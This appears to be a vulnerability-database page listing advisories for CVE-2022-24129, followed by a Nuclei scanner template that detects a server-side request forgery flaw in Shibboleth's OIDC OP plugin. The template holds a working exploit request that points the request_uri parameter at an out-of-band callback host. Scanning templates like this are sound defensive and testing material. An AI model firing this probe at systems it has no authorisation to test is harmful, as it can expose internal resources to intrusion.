| Title | Published | Views | Reporter | Family |
|---|---|---|---|---|
| CVE-2022-24129 | 4 Feb 2022 20:15 | – | attackerkb | |
| CVE-2022-24129 | 4 Feb 2022 22:36 | – | circl | |
| Shibboleth Code Issue Vulnerability | 4 Feb 2022 00:00 | – | cnnvd | |
| CVE-2022-24129 | 4 Feb 2022 19:20 | – | cve | |
| CVE-2022-24129 | 4 Feb 2022 19:20 | – | cvelist | |
| CVE-2022-24129 | 4 Feb 2022 20:15 | – | nvd | |
| CVE-2022-24129 | 4 Feb 2022 20:15 | – | osv | |
| Server side request forgery (ssrf) | 4 Feb 2022 20:15 | – | prion | |
| CVE-2022-24129 | 22 May 2025 23:57 | – | redhatcve | |
```yaml
id: CVE-2022-24129

info:
  name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: high
  description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure.
  remediation: |
    Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability.
  reference:
    - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
    - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP
    - http://shibboleth.net/community/advisories/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24129
    - http://shibboleth.net/community/advisories/secadv_20220131.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2022-24129
    cwe-id: CWE-918
    epss-score: 0.06139
    epss-percentile: 0.92564
    cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:*
  metadata:
    max-request: 1
    vendor: shibboleth
    product: oidc_op
    framework: identity_provider
  tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "ShibbolethIdp"
# digest: 4a0a00473045022100c402db0231ed1a1da41eb49923463cb440ce0436fbad6ecf3d6de1da45d9e53602201091273daac6faabbab179875031d5bc63f7739c79d5bef368b79b73f51cde68:922c64590222798bb761d5b6d8e72950
```